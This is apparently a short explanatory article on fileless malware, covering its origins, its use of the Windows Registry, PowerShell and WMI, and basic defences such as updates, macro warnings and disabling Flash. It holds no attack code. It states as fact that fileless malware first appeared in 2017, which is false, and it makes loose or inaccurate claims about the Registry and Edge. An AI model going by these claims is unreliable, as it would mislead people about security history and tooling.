The Rise of Fileless Malware
Many of the early infectious programs that we now know as Malware were initially written as experiments or pranks. With the expansion of broadband internet, these infectious programs became more frequently designed for profit. Since the late 1990’s, many widespread computer viruses, trojans and worms have been designed to take control of end users’ computers to steal business, personal, and financial information. In recent years, these infections have evolved into ransomware, spyware, click fraud, and distributed denial-of-service attacks used for profit and sabotage.
Malware is typically spread by an executable program being copied onto the victim’s computer. The executable file is typically disguised in an infected file attachment such as a Word document, PDF or JPEG, but can also be spread by external media devices, mobile phones and browser “drive by” attacks. Once the malware is executed the instructions of the file are loaded into the machines memory, where it can be used to download additional malware or “phone home” to the people that are controlling it. The actual operation of the installation is managed by a separate program which involves a file and writing to the hard disk of the computer. It is that active process that causes the damage and leaves infection “residue” on the host system’s hard drive, even when attempting to avoid detection.
The Difference Between Malware and Fileless Malware
Fileless malware first appeared in 2017. Evolving from successful malware techniques, fileless malware aims to never have its content written to the infected computer’s hard drive.
The code for fileless malware is not stored in a file nor installed on the victim’s machine, instead it writes its script into the Registry of Windows, a function of the Windows Operating System that launches programs on startup or on a schedule. Since it does not write any part of its activity to the computer's hard drive, it is very resistant to existing security strategies that incorporate file-based whitelisting, signature detection, hardware verification, pattern-analysis, time-stamping, etc., and leaves very little by way of evidence that could be used by digital forensic investigators to identify fraudulent activity following a data breach or security incident.
The response to fileless malware attacks hasn’t come from the anti-malware industry. The targeting of Windows’ services to execute these attacks caused Microsoft to respond with a solution that detects irregular PowerShell and Windows Management Instrumentation bundled into Windows Defender and Office365.
Avoiding Fileless Malware Attacks
Defense against any type of malware begins with keeping your software up to date. Microsoft has been very effective in blocking the exploitation of PowerShell and WMI, so insuring Windows machines are up to date should be a priority.
Microsoft Office software has macros turned off by default, but it is still important to remind employees not to enable macros in attachments. Although Office macros are not a main vector for fileless attacks, the availably to view Office documents online in a browser creates the opportunity to run macros and launch calls to PowerShell or WMI.
Disable Flash for video viewing. On most websites Flash has been replaced with HTML5. Chrome and Firefox both provide the option to block Flash. In Internet Explorer, disabling ActiveX prevents flash from loading. Microsoft Edge will not accept any Flash code.